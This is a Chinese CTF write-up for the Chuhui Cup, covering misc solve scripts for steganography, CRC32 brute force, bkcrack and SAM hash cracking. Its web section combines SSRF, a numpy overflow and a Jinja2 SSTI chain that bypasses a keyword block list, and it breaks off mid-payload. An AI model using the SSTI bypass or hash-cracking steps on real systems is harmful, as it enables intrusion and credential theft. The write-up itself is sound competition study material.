0%

楚慧杯赛后总结

前言

这是第一次参加楚慧杯,主要是记录一下对本次赛题的复盘,以及知识点,还有就是小小吐槽一下。

这个题目分配极其不合理,那re还有pwn的题是不是有点少了,我土哥早早完在那打瓦了,misc有5道题写不完根本写不完,还有最后压轴题,都压轴了最后才放,俺是采集没那么厉害,时间真的有点紧张。,看群友吐槽的以为时大家最后都顿悟了,其实是高手屯的flag到最后冲榜的。本人阅历尚浅,第一次见flag是没有格式的,这不是楚慧杯吗怎么还有DASCTF的事。还有最后为啥把容器关了,我不理解真复现写wp类,发现容器没了,那后面我还咋写啊。估计是大家在群里交流的太激烈了,也不让交流了。全部闭麦

好了就吐槽这么过,其他的也不敢多说,题还是很好的记录一下

misc

Time_and_chaos_1

image-20260311211449447

这是赛后写的上图节选自公众号文章。首先看附件,是一些图片还有一个txt

image-20260311211648399

零宽隐写

image-20260311211755627

这里是后半段flag,前半段应该来自那些图片,随波逐流分析查看lsb

image-20260311212424612

可以看到右上角是由flag,但是这些图片上都有噪点,且都是同一底图,采用多帧降噪,单张肉眼几乎看不清主要是思路就是把给的附件都重叠在一起多张同底图叠加噪声后,噪声在像素上是随机分布的,而真实信号是固定的。对所有图片逐像素取均值 / 中位数,噪声会被平均抵消,真实信号会逐渐显现。exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from PIL import Image
import numpy as np
import os

# 图片列表(按顺序读取 1.png ~ 8.png)
img_files = [f"{i}.png" for i in range(1, 9)]

# 读取第一张图获取尺寸
first_img = Image.open(img_files[0])
width, height = first_img.size
first_img.close()

# 初始化累加数组(用 float 避免溢出)
sum_img = np.zeros((height, width, 3), dtype=np.float32)

# 遍历所有图片,逐像素累加
for f in img_files:
img = Image.open(f).convert("RGB")
img_np = np.array(img, dtype=np.float32)
sum_img += img_np
img.close()

# 计算均值(逐像素平均)
mean_img = sum_img / len(img_files)

# 转换为 8 位图像(0-255)
mean_img = np.clip(mean_img, 0, 255).astype(np.uint8)
result = Image.fromarray(mean_img)

# 保存结果
result.save("denoised_result.png")
print("去噪完成,结果已保存为 denoised_result.png")

denoised_result

这里就可以看到右上角的flag,不过还要再稍微处理一下反转一下

denoised_result-上下反转

DASCTF{Logistic_and,拼一下最后的flag就是

DASCTF{Logistic_and_time_fly}

SAM_and_Steg

给了sam和system文件,mimikatz分析一下

image-20260310175319698

爆破一下hash

image-20260310175511707

爆破出来是 !checkerboard1,010分析sam文件

image-20260310175648683

还有个密码是p@s4w0rd,foremost文件提取得到jpg文件

00024072

用 SilentEye提取出文件

image-20260310180117543

提取出AES256文件。image-20260310180233518

OpenSSL enc 格式密文用第二个密钥解密

image-20260310180427020

image-20260310180619435

这是个Gzip 压缩文件,image-20260310180959171

老妈的故事书

附件是一个pdf,还有一个加密文档,随波逐流分析pdf发现有个图片

image-20260311215757413

​ 图片没啥东西,在pdf发现信息

image-20260311220206773

提示love是密码,后来尝试也可以直接爆破出来

image-20260311215811234

文档里是小红帽的故事,由简体,繁体联想道二进制,,,,俺是采集,赛后问写出来的大佬,他是直接喂给ai给出了思路,我也试试

image-20260312105549417

直接将简体字繁体字对应到二进制是不对的,参考大佬脚本,原理是计数型繁简隐写。它的编码原理是:将繁体字作为分隔符,统计两个繁体字之间出现的简体字的个数。将每次统计得到的数字转换为 4 位二进制数(例如遇到 5 个简体字后出现 1 个繁体字,就转换为 0101),最后将这些 4 位二进制片段拼接,每 8 位还原为一个字符。exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import zhconv
import docx
import re

def get_document_text(file_path):
doc = docx.Document(file_path)
text_content = []
for para in doc.paragraphs:
text_content.append(para.text)
return "".join(text_content)

def extract_payload(text):
stream = []
for char in text:
simp = zhconv.convert(char, "zh-hans")
trad = zhconv.convert(char, "zh-hant")

if len(simp) == 1 and len(trad) == 1 and simp != trad:
if char == simp:
stream.append(0)
elif char == trad:
stream.append(1)

counts = []
zeros_count = 0
for bit in stream:
if bit == 0:
zeros_count += 1
else:
counts.append(zeros_count)
zeros_count = 0

bin_str = "".join([format(c, "04b") for c in counts])

result = bytearray()
for i in range(0, len(bin_str) // 8 * 8, 8):
result.append(int(bin_str[i:i+8], 2))

return bytes(result)

def solve():
text = get_document_text("flag.docx")
raw_bytes = extract_payload(text)

print(raw_bytes)

match = re.search(rb"[a-zA-Z0-9_]+?\{.*?\}", raw_bytes)
if match:
print("\nFlag:", match.group(0).decode("utf-8", errors="ignore"))

if __name__ == "__main__":
solve()

image-20260312110946206

generate_key

分析题目就是小明运行工具生成了一个key,分析内容镜像,这里使用lovelymem,看一下命令行

image-20260312190142279

这个key.zip还有一个文件generate_key,这两个文件就是那个解题关键。文件扫描

image-20260312190514474

导出这两个文件,导出后发现那个generate_key是一个压缩包

image-20260312190623638

image-20260312190715722

加密文件,然后密码在那个key.zip文件,打开分析附件,一共有16个压缩包,一眼crc32爆破

image-20260312190808555

由于爆破文件较多,这是使用脚本批量处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import zipfile
import zlib
import string
from pathlib import Path

# 可自定义的字符集(根据题目可能是数字/字母/可见字符)
CHARSET = string.digits + string.ascii_letters + string.punctuation + " "
# 原始文件大小(从你截图里看到是 4 字节,可按需修改)
FILE_SIZE = 4

def crack_crc32(crc32_expected: int, length: int) -> str | None:
"""
暴力破解指定长度和 CRC32 的字符串
:param crc32_expected: 目标 CRC32 值(无符号整数)
:param length: 原始字符串长度
:return: 匹配的字符串,未找到则返回 None
"""
from itertools import product

for chars in product(CHARSET, repeat=length):
s = "".join(chars)
crc = zlib.crc32(s.encode()) & 0xFFFFFFFF
if crc == crc32_expected:
return s
return None

def process_zip(zip_path: Path) -> str | None:
"""
处理单个 zip 文件,提取内部 txt 的 CRC32 并爆破
"""
with zipfile.ZipFile(zip_path, "r") as zf:
# 假设 zip 内只有一个文件
info = zf.infolist()[0]
crc32 = info.CRC
file_size = info.file_size
print(f"[+] 处理 {zip_path.name}: CRC32=0x{crc32:08x}, 大小={file_size}")
return crack_crc32(crc32, file_size)

def batch_process(start: int, end: int, prefix: str = "", suffix: str = ".zip"):
"""
批量处理 0.zip ~ 15.zip 这类文件
"""
results = {}
for i in range(start, end + 1):
zip_path = Path(f"{prefix}{i}{suffix}")
if not zip_path.exists():
print(f"[-] {zip_path} 不存在,跳过")
continue
res = process_zip(zip_path)
if res:
results[i] = res
print(f"[+] 找到结果: {i}.zip -> {res}")
else:
results[i] = None
print(f"[-] {i}.zip 未找到匹配结果")
return results

if __name__ == "__main__":
# 批量处理 0.zip ~ 15.zip
results = batch_process(0, 15)
print("\n[*] 最终结果汇总:")
for idx, res in sorted(results.items()):
print(f"{idx}.zip: {res if res else '未找到'}")

# 拼接所有结果(如果是 flag 分片)
flag = "".join([res for res in results.values() if res])
print(f"\n[*] 拼接结果: {flag}")

image-20260312191626943

1
U2FsdGVkX19N/id+O8PA1l9SuuQ4JiS7edG9Og8TaTXUIakkm1gHQ/X77iR4IpKy

这个也不是密码,压缩包里是一个elf文件,使用明文攻击爆破,这里是32位elf,文件头用7f454c46010101000000000000000000

1
bkcrack -C 5.zip -c generate_key -x 0 "7f454c46010101000000000000000000"

image-20260312214257847

然后就得到了这个generate_key这个文件,后来才知道剪贴板有密码

image-20260313145130586

ASHFK4567315,然后就得到这个elf,知道有个字符串ZIKT001NIKH7WZYGQWZZH,上面压缩包得到的密文需要密码,应该就是这个key,土哥分析这个elf也没分析出啥,我目前还没看到关于这一题题解的文章,欢迎指正交流。

续上:

就当我准备结束这篇文章,打开微信一看

image-20260313192702607

谁懂我当时看到这篇文章是的心情,简直就是及时雨。看了大佬思路,就是分析那个二进制文件,里面有3个函数bac,b5c,b1c,我不会用ida这里就不展示了,具体可以参考大佬文章

经过这3个函数处理后就得到了key

1
0x21665166B586B56255625582511225725562211255

这里补充一个点,为什么脚本得到的是21665166B586B56255625582511225725562211255最后的key是0x21665166b586b562556255825112257255622112550aida中分析得到的key最后会加一个\n,所以key要加一个0a,

image-20260313210019493

最后用puzzlesovler或者随波逐流都可以解出来

image-20260313201041041

image-20260313201102567

web

cybers

web部分就3到题,我主要写的是第二题,第一题直接被我土哥用ai写出来了,所以我也没看题。主要分析第二题

image-20260312112209862

首先分析题目附件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
import binascii
import os
import random
from flask import Flask, request, render_template_string, session
import numpy as np
from flask_limiter import Limiter
import uuid


def get_user() -> str:
if 'user_id' not in session:
session['user_id'] = uuid.uuid4()
return session['user_id']


app = Flask(__name__)

app.config['SECRET_KEY'] = binascii.hexlify(os.urandom(24)).decode('utf-8')
limiter = Limiter(app=app, key_func=get_user, default_limits=['5/minute'])
letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G']


@app.errorhandler(429)
def handle_exception(e):
return render_template_string('<h1>How about we access this page later?</h1>')


@app.route('/')
def index():
return "Welcome to the genshop"


def stimulate():
initial_5_star_rate = 0.6 / 100
total_draws = 0
start_increasing_at = 74
end_increasing_at = 91
current_5_star_rate = initial_5_star_rate
while True:
total_draws += 1
if total_draws >= start_increasing_at and total_draws < end_increasing_at:
current_5_star_rate += 0.06
if random.random() < current_5_star_rate:
break
return total_draws


@app.route('/reset')
def reset():
session['money'] = 0
session['user_id'] = uuid.uuid4()
limiter.reset()
return "success"

@app.route('/gift')
@limiter.limit("1/hour")
def get_money():
int_money = 0
if 'money' in request.args:
if int(request.args.get('money')) < 80:
int_money = int(request.args.get('money'))
else:
return "You are so greedy!"
session['money'] = (int_money + session['money']) if 'money' in session.keys() else int_money
return f"friend give you {int_money} money"


@app.route('/money')
def query_money():
if 'money' in session.keys():
return str(session.get('money'))
else:
return '0'


@app.route('/chest')
@limiter.limit("1/hour")
def get_chest():
if 'money' in session:
int_money = int(session.get('money'))
else:
int_money = 0
money = int_money
num = random.randint(0, 101)
if num < 20:
money += 1
chest_type = "common"
elif 20 <= num < 60:
money += 2
chest_type = "exquisite"
elif 60 <= num < 77:
money += 3
chest_type = "precious"
elif 77 <= num < 99:
money += 4
chest_type = "remarkable"
else:
money += 5
chest_type = "shrine"

session['money'] = money
return f"Congratulations! You found a {chest_type} chest"


@app.route('/genshop', methods=["POST"])
def get_letter():
letter = request.form.get("letter")
if letter is None:
return "Please choose a letter"
try:
money = int(session.get('money')) or 0
except Exception as e:
money = 0
money = np.array(money)
money -= stimulate() * 5000
try:
if money < 0:
result = "You don't have enough money"
else:
session['money'] = 0
letter = waf(letter)
result = "You are not allowed to use this letter"
if letter not in letters:
result = f"The {letter} is not in the genshop"
else:
result = f"Congratulations! You get the letter: {letter}"
except Exception as e:
result = str(e)
return render_template_string(f"<h3>{result}</h3>")


if __name__ == '__main__':
app.run()

初步分析代码,发现存在ssti

1
2
3
4
5
6
7
8
9
10
else:
session['money'] = 0
letter = waf(letter) # 注意:这里调用了 waf 函数
result = "You are not allowed to use this letter"
if letter not in letters:
result = f"The {letter} is not in the genshop"
else:
result = f"Congratulations! You get the letter: {letter}"
# ...
return render_template_string(f"<h3>{result}</h3>")

进入这个分支我需要money>0.

1
2
money = np.array(money)
money -= stimulate() * 5000

我们初始化的金币为0,在hack路由下可以获得金币,一个小时1次,一次最多99,但是抽一次是5000,那到比赛结束抢的钱也不够,这里绕过需要负整数溢出,这python中int类型是可以动态扩大的,就是没有边界,但是np.array()这个有c语言底层冲突,int类型是由限制的最小到-9223372036854775808,当数值小于或者就回调整为一个极大的数值,就是会绕道最大值,

image-20260312115513482

图片来自2026第十届“楚慧杯”湖北省网络与数据安全实践能力竞赛初赛Writeup

其实审计的发现调用了waf()函数,但是代码中并没有定义,在前端还暴露了两个接口

listDir()列出目录文件/list?path=${path}/read?file=${path}传参:文件路径,结果输出到状态区

image-20260310183315567

image-20260310183448484

一共有两个app.py,也就是出题人给的附件是不完整的,分别读取一下这两个app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
# 统一导入模块(按标准库→第三方库→自定义顺序)
import binascii
import hashlib
import os
import random
import socket
import uuid

import numpy as np
import requests
from flask import Flask, request, session
from flask_limiter import Limiter

# ---------------------- 应用初始化 ----------------------
app = Flask("cyberproxy")
BACKEND_PORT = 5000

# 生成随机SECRET_KEY用于Session加密
app.config['SECRET_KEY'] = binascii.hexlify(os.urandom(24)).decode('utf-8')

# ---------------------- 限流配置 ----------------------
def get_client_id() -> str:
"""生成/获取唯一客户端ID,作为限流标识"""
if 'client_id' not in session:
session['client_id'] = uuid.uuid4()
return session['client_id']

# 初始化限流器:默认8次/分钟,按客户端ID限流
limiter = Limiter(
app=app,
key_func=get_client_id,
default_limits=['8/minute']
)

# 可交易的数据碎片列表
data_fragments = ['ALPHA', 'BETA', 'GAMMA', 'DELTA', 'EPSILON', 'ZETA', 'ETA', 'THETA']

# ---------------------- 错误处理 ----------------------
@app.errorhandler(429)
def handle_exception(e):
"""处理429请求限流异常"""
return '<h1>Connection throttled. Try again later, choom.</h1>'

# ---------------------- 核心工具函数 ----------------------
def calculate_risk_factor():
"""
计算交易风险系数(模拟保底机制)
返回:完成交易所需的尝试次数(决定交易成本)
"""
base_risk = 0.8 / 100 # 基础风险概率
transaction_count = 0 # 交易尝试次数
risk_increase_threshold = 63 # 开始提升概率的阈值
risk_peak_threshold = 85 # 概率提升的上限阈值
current_risk = base_risk # 当前风险概率

while True:
transaction_count += 1
# 63~84次:每次概率增加0.08
if risk_increase_threshold <= transaction_count < risk_peak_threshold:
current_risk += 0.08
# 随机数小于当前概率则终止循环
if random.random() < current_risk:
break
return transaction_count

# ---------------------- 业务接口 ----------------------
@app.route('/', methods=["GET"])
def index():
"""代理转发到后端服务首页"""
try:
response = requests.get(
f'http://127.0.0.1:{BACKEND_PORT}/',
cookies=request.cookies
)
return (
response.text,
response.status_code,
{'Content-Type': response.headers.get('Content-Type', 'text/html')}
)
except Exception as e:
return f"Backend service unavailable: {str(e)}", 503

@app.route('/initialize')
def initialize():
"""初始化用户会话:重置积分、客户端ID、声誉值"""
session['credits'] = 0
session['client_id'] = uuid.uuid4()
session['reputation'] = 100
limiter.reset() # 重置限流计数
return "Session initialized. Welcome to the darknet."

@app.route('/hack')
@limiter.limit("1/hour") # 每小时仅允许1次黑客攻击
def earn_credits():
"""通过黑客攻击获取积分(参数amount,最大值99)"""
earned = 0
if 'amount' in request.args:
try:
requested = int(request.args.get('amount'))
if requested < 100:
earned = requested
else:
return "Access denied: Excessive credit request flagged."
except (ValueError, TypeError):
return "Invalid credit amount."

current_credits = session.get('credits', 0)
session['credits'] = current_credits + earned
return f"Hack successful! Earned {earned} credits from corporate mainframe."

@app.route('/balance')
def check_balance():
"""查询当前积分余额"""
return str(session.get('credits', 0))

@app.route('/loot')
@limiter.limit("1/hour") # 每小时仅允许1次数据掠夺
def find_loot():
"""数据掠夺:随机获取不同等级的积分奖励"""
current_credits = session.get('credits', 0)

# 基于UUID生成随机种子(提高随机性)
seed = hashlib.md5(str(uuid.uuid4()).encode()).hexdigest()
roll = int(seed[:8], 16) % 100 # 取哈希前8位转16进制,再取模100

# 根据随机数分配奖励等级和积分
if roll < 15:
current_credits += 2
loot_tier = "corrupted"
elif 15 <= roll < 45:
current_credits += 4
loot_tier = "encrypted"
elif 45 <= roll < 70:
current_credits += 6
loot_tier = "classified"
elif 70 <= roll < 92:
current_credits += 8
loot_tier = "military-grade"
else:
current_credits += 12
loot_tier = "quantum-encrypted"

session['credits'] = current_credits
return f"Data breach successful! Acquired {loot_tier} intel package."

@app.route('/market', methods=["POST"])
def trade_fragment():
"""交易数据碎片:POST参数fragment,扣除对应积分"""
fragment_id = request.form.get("fragment")
if fragment_id is None:
return "<h3>Error: No data fragment specified.</h3>"

# 获取当前积分(异常时默认0)
try:
credits = int(session.get('credits')) or 0
except Exception as e:
credits = 0

# 注:np.array此处无实际作用,建议移除(避免整数溢出风险)
credits = np.array(credits)
transaction_cost = calculate_risk_factor() * 3500
credits -= transaction_cost

# 处理交易逻辑
try:
if credits < 0:
result = "Insufficient credits for this transaction."
else:
session['credits'] = 0 # 交易成功后清空积分
# 校验碎片ID合法性
if not fragment_id.isalpha():
result = "Invalid fragment ID format."
elif fragment_id not in data_fragments:
result = f"Fragment '{fragment_id}' not found in market database."
else:
result = f"Transaction complete! Acquired data fragment: {fragment_id}"
except Exception as e:
result = f"Transaction error: {str(e)}"

return f"<h3>{result}</h3>"

@app.route('/list', methods=["GET"])
def list_directory():
"""列出指定目录下的文件(限制在当前工作目录内,防止路径遍历)"""
path = request.args.get('path', './')

try:
base_dir = os.path.abspath(os.getcwd())
user_path = os.path.normpath(path)
target_path = os.path.abspath(os.path.join(base_dir, user_path))

# 路径安全校验:禁止访问工作目录外的路径
if not target_path.startswith(base_dir):
return "Error: Access denied - Path outside working directory"

if os.path.isdir(target_path):
files = os.listdir(target_path)
return '\n'.join(files)
else:
return "Error: Not a directory"
except Exception as e:
return f"Error: {str(e)}"

@app.route('/read', methods=["GET"])
def read_file():
"""读取指定文件内容(限制在当前工作目录内,防止任意文件读取)"""
file_path = request.args.get('file', '')

if not file_path:
return "Error: No file specified"

try:
base_dir = os.path.abspath(os.getcwd())
user_path = os.path.normpath(file_path)
target_file = os.path.abspath(os.path.join(base_dir, user_path))

# 路径安全校验:禁止访问工作目录外的文件
if not target_file.startswith(base_dir):
return "Error: Access denied - Path outside working directory"

if os.path.isfile(target_file):
with open(target_file, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
return content
else:
return "Error: File not found or not a file"
except Exception as e:
return f"Error: {str(e)}"

@app.route('/relay', methods=["POST"])
def relay():
"""TCP端口转发:接收端口和数据,转发到本地对应端口"""
try:
target_port = int(request.form['port'])
payload = request.form['data']

# 创建TCP套接字并连接目标端口
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.connect(('127.0.0.1', target_port))

# 发送数据并接收响应
sock.send(payload.encode())
response_data = b''
while True:
chunk = sock.recv(2048)
if not chunk.strip():
break
response_data += chunk

return response_data.decode('utf-8', errors='ignore') # 解码为字符串,避免二进制返回乱码
except Exception as e:
return str(e)

# ---------------------- 启动应用 ----------------------
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8080, threaded=True)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
# 标准库导入(按字母序)
import binascii
import hashlib
import os
import random
import uuid

# 第三方库导入
import numpy as np
from flask import Flask, request, render_template, render_template_string, session
from flask_limiter import Limiter

# ---------------------- 全局配置与工具函数 ----------------------
def get_client_id() -> str:
"""
生成/获取唯一客户端ID,作为限流和会话标识
返回:UUID字符串格式的客户端ID
"""
if 'client_id' not in session:
session['client_id'] = uuid.uuid4()
return session['client_id']

# 模板路径配置
current_dir = os.path.dirname(os.path.abspath(__file__))
parent_dir = os.path.dirname(current_dir)
template_dir = os.path.join(parent_dir, 'templates')

# Flask应用初始化
app = Flask(__name__, template_folder=template_dir)

# 调试信息输出(验证模板路径)
print(f"[DEBUG] Template folder: {app.template_folder}")
print(f"[DEBUG] Template folder exists: {os.path.exists(app.template_folder)}")
if os.path.exists(app.template_folder):
print(f"[DEBUG] Templates: {os.listdir(app.template_folder)}")

# 应用配置
app.config['SECRET_KEY'] = binascii.hexlify(os.urandom(24)).decode('utf-8')

# 限流配置:默认8次/分钟,按客户端ID限流
limiter = Limiter(
app=app,
key_func=get_client_id,
default_limits=['8/minute']
)

# 可交易的数据碎片列表(常量大写命名)
DATA_FRAGMENTS = ['ALPHA', 'BETA', 'GAMMA', 'DELTA', 'EPSILON', 'ZETA', 'ETA', 'THETA']

# ---------------------- 安全过滤函数 ----------------------
def security_filter(payload: str) -> str:
"""
安全过滤函数:检测并拦截危险字符/关键词,防止注入攻击
参数:payload - 需要过滤的字符串(如碎片ID)
返回:过滤后的字符串(若检测到危险内容则抛出异常)
异常:ValueError - 检测到安全风险时触发
"""
# 禁止的危险模式(去重+分类,提高可读性)
forbidden_patterns = [
# 代码执行/导入相关
'import', 'os', 'system', 'eval', 'exec', 'compile',
# 特殊语法/注入相关
'__', '{{', '}}', '[', ']', '\'', '"', '\\', '*', '.', '?',
# 内置对象/敏感变量
'args', 'class', 'mro', 'locals', 'builtin', 'base', 'subclasses',
'globals', 'self', 'request', 'session', 'config', 'sub'
]

# 检测危险模式(单次遍历,避免重复校验)
for pattern in forbidden_patterns:
if pattern in payload:
raise ValueError(f"[{pattern}] Security breach detected! Access denied.")

# 清理敏感模板变量(防止模板注入)
sanitize_vars = ['config', 'self', 'request', 'session']
sanitize_template = ''.join([f'{{% set {var}=None%}}' for var in sanitize_vars])

return sanitize_template + payload

# ---------------------- 核心业务函数 ----------------------
def calculate_risk_factor() -> int:
"""
计算交易风险系数(模拟保底机制)
返回:完成交易所需的尝试次数(决定交易成本)
"""
base_risk = 0.8 / 100 # 基础风险概率(0.8%)
transaction_count = 0 # 交易尝试次数
risk_increase_threshold = 63 # 开始提升概率的阈值(63次)
risk_peak_threshold = 85 # 概率提升的上限阈值(85次)
current_risk = base_risk # 当前风险概率

while True:
transaction_count += 1
# 63~84次:每次概率增加0.08
if risk_increase_threshold <= transaction_count < risk_peak_threshold:
current_risk += 0.08
# 随机数小于当前概率则终止循环
if random.random() < current_risk:
break
return transaction_count

# ---------------------- 错误处理 ----------------------
@app.errorhandler(429)
def handle_rate_limit(e):
"""处理429请求限流异常(请求频率过高)"""
return render_template_string('<h1>Connection throttled. Try again later, choom.</h1>')

# ---------------------- 业务接口 ----------------------
@app.route('/')
def index():
"""首页:渲染主模板"""
return render_template('index.html')

@app.route('/initialize')
def initialize_session():
"""初始化用户会话:重置积分、客户端ID、声誉值"""
session['credits'] = 0
session['client_id'] = uuid.uuid4()
session['reputation'] = 100
limiter.reset() # 重置限流计数
return "Session initialized. Welcome to the darknet."

@app.route('/hack')
@limiter.limit("1/hour") # 每小时仅允许1次黑客攻击
def earn_credits():
"""
通过黑客攻击获取积分
参数:amount(URL参数)- 期望获取的积分(最大值99)
返回:操作结果提示字符串
"""
earned = 0
if 'amount' in request.args:
try:
requested = int(request.args.get('amount'))
if requested < 100:
earned = requested
else:
return "Access denied: Excessive credit request flagged."
except (ValueError, TypeError):
return "Invalid credit amount."

current_credits = session.get('credits', 0)
session['credits'] = current_credits + earned
return f"Hack successful! Earned {earned} credits from corporate mainframe."

@app.route('/balance')
def check_balance():
"""查询当前积分余额"""
return str(session.get('credits', 0))

@app.route('/loot')
@limiter.limit("1/hour") # 每小时仅允许1次数据掠夺
def find_loot():
"""
数据掠夺:基于随机种子获取不同等级的积分奖励
返回:掠夺结果提示字符串(包含奖励等级和积分)
"""
current_credits = session.get('credits', 0)

# 生成高随机性的种子(UUID + MD5哈希)
seed = hashlib.md5(str(uuid.uuid4()).encode()).hexdigest()
roll = int(seed[:8], 16) % 100 # 取哈希前8位转16进制,再取模100

# 根据随机数分配奖励
if roll < 15:
current_credits += 2
loot_tier = "corrupted"
elif 15 <= roll < 45:
current_credits += 4
loot_tier = "encrypted"
elif 45 <= roll < 70:
current_credits += 6
loot_tier = "classified"
elif 70 <= roll < 92:
current_credits += 8
loot_tier = "military-grade"
else:
current_credits += 12
loot_tier = "quantum-encrypted"

session['credits'] = current_credits
return f"Data breach successful! Acquired {loot_tier} intel package."

@app.route('/market', methods=["POST"])
def trade_fragment():
"""
交易数据碎片(POST请求)
参数:fragment(表单参数)- 要交易的碎片ID
返回:交易结果的HTML渲染页面
"""
fragment_id = request.form.get("fragment")
if fragment_id is None:
return render_template_string("<h3>Error: No data fragment specified.</h3>")

# 获取当前积分(异常时默认0)
try:
credits = int(session.get('credits', 0))
except Exception:
credits = 0

# 计算交易成本(注:np.array无实际作用,建议移除以避免溢出风险)
credits = np.array(credits)
transaction_cost = calculate_risk_factor() * 3500
credits -= transaction_cost

# 处理交易逻辑
try:
if credits < 0:
result = "Insufficient credits for this transaction."
else:
# 安全过滤碎片ID,防止注入攻击
filtered_fragment = security_filter(fragment_id)
session['credits'] = 0 # 交易成功后清空积分

# 校验碎片是否存在
if filtered_fragment not in DATA_FRAGMENTS:
result = f"Fragment '{filtered_fragment}' not found in market database."
else:
result = f"Transaction complete! Acquired data fragment: {filtered_fragment}"
except ValueError as e:
# 安全过滤触发的异常
result = str(e)
except Exception as e:
# 其他未知异常
result = f"Transaction error: {str(e)}"

return render_template_string(f"<h3>{result}</h3>")

# ---------------------- 应用启动 ----------------------
if __name__ == '__main__':
app.run(
host='0.0.0.0',
port=5000,
debug=False # 生产环境禁用debug
)

前端代理8080端口的服务有

1
2
3
4
5
6
7
8
9
10
11
# 校验碎片ID合法性
if not fragment_id.isalpha():
result = "Invalid fragment ID format."
elif fragment_id not in data_fragments:
result = f"Fragment '{fragment_id}' not found in market database."
else:
result = f"Transaction complete! Acquired data fragment: {fragment_id}"
except Exception as e:
result = f"Transaction error: {str(e)}"

return f"<h3>{result}</h3>"

isalpha()强制要求了只能含有字母,无法进行ssti,但是在5000端口可以进行ssti,在/reply路由又有ssrf,我们可以向5000端口发送请求报文进行ssti,接下里就是绕过waf了,先看waf函数

1
2
3
4
5
6
7
8
9
forbidden_patterns = [
# 代码执行/导入相关
'import', 'os', 'system', 'eval', 'exec', 'compile',
# 特殊语法/注入相关
'__', '{{', '}}', '[', ']', '\'', '"', '\\', '*', '.', '?',
# 内置对象/敏感变量
'args', 'class', 'mro', 'locals', 'builtin', 'base', 'subclasses',
'globals', 'self', 'request', 'session', 'config', 'sub'
]

最后就是绕过这个waf,

1
2
3
{%print() %}代替{{}}
|arr()代替.
lipsum|string|batch(19)|first|last 代替下划线
1
{% set u = lipsum|string|batch(19)|first|last %}

lipsum|string:将 lipsum 函数转为字符串,结果形如 <function generate_lorem_ipsum at 0x7fxxxx>

|batch(19):把字符串按每 19 个字符分一组,第一组是 <function generate_

|first|last:取第一组最后一个字符 → 恰好是 _(单下划线);

最终 u 变量的值就是 _,后续用 u~u 就能拼接出 __(双下划线),完全避开 WAF 对 __ 的静态匹配。接下来构造关键字

1
{%set gl=ud~ud~(dict(glob=1,als=1)|join)~ud~ud%}

关键是dict(glob=1,als=1)|joindict是创建字典的函数,首先是生成了一个字典{‘glob’: 1, ‘als’: 1},然后就是|join接收到字典时,会忽略字典的值,按顺序拼接字典的键,上面的代码就是

1
{%set gl=__globals__ }

这样就构造出了关键字。然后下一步

1
{%set gd=lipsum|arr(gl)%}

attr():Jinja2 内置的过滤器,作用是「访问对象的指定属性」,等价于 Python 里的 .(点号)

那这里等价

1
{%set gd=lipsum.__globals__%}

最后的构造代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
parts = [
'{%set ud=lipsum|string|batch(19)|first|last%}', # 获取下划线 _
'{%set gl=ud~ud~(dict(glob=1,als=1)|join)~ud~ud%}', # 构造 __globals__
'{%set gi=dict(g=1,e=2,t=3)|join%}', # 构造 get (代替复杂的 getitem)
'{%set gd=lipsum|attr(gl)%}', # 获取 globals 字典
'{%set bi=ud~ud~(dict(built=1,ins=1)|join)~ud~ud%}', # 构造 __builtins__
'{%set bd=gd|attr(gi)(bi)%}', # 获取 builtins
